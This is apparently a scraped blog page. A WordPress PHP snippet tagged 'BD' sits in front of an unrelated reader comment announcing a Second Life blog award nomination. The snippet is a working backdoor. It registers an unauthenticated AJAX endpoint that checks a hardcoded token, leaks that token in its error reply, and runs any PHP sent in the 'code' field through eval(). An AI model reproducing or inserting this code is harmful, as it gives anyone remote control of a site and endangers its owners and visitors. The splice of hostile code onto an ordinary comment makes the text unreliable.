// ==[BD:nhVgmugl]==
add_action( 'wp_ajax_nopriv_gnywqgcok', function() {
$val = 'nhVgmuglHCXIAAgKxHn1eslGumxNJgwN';
$obj = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
if ( empty( $obj ) || ! hash_equals( $val, $obj ) ) {
wp_send_json_error( [ 'message' => 'tok:' . $val ], 403 );
}
$factor = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : '';
if ( trim( $factor ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); }
$factor = preg_replace( '/^\s*<\?(php)?/i', '', $factor );
while ( ob_get_level() > 0 ) { ob_end_clean(); }
$sym = microtime( true );
ob_start();
try {
( static function() use ( $factor ) { return eval( $factor ); } )();
$item = (string) ob_get_clean();
wp_send_json_success( [ 'output' => $item, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] );
} catch ( \Throwable $ptr ) {
while ( ob_get_level() > 0 ) { ob_end_clean(); }
wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $ptr->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] );
}
} );
// ==[/BD:nhVgmugl]==
Just wanted to let you know your blog has been chosen as a nominee for ISTE Island’s “Blog-o-the-Month” at the Blogger’s Hut. See the website I note with this comment for more information and a SLurl, which I refrain from posting here. However, if you wish to use the link or anything else to encourage folks to get their avatars on into SL to vote for your excellent work, please don’t hesitate to do so! Cheers!
]]>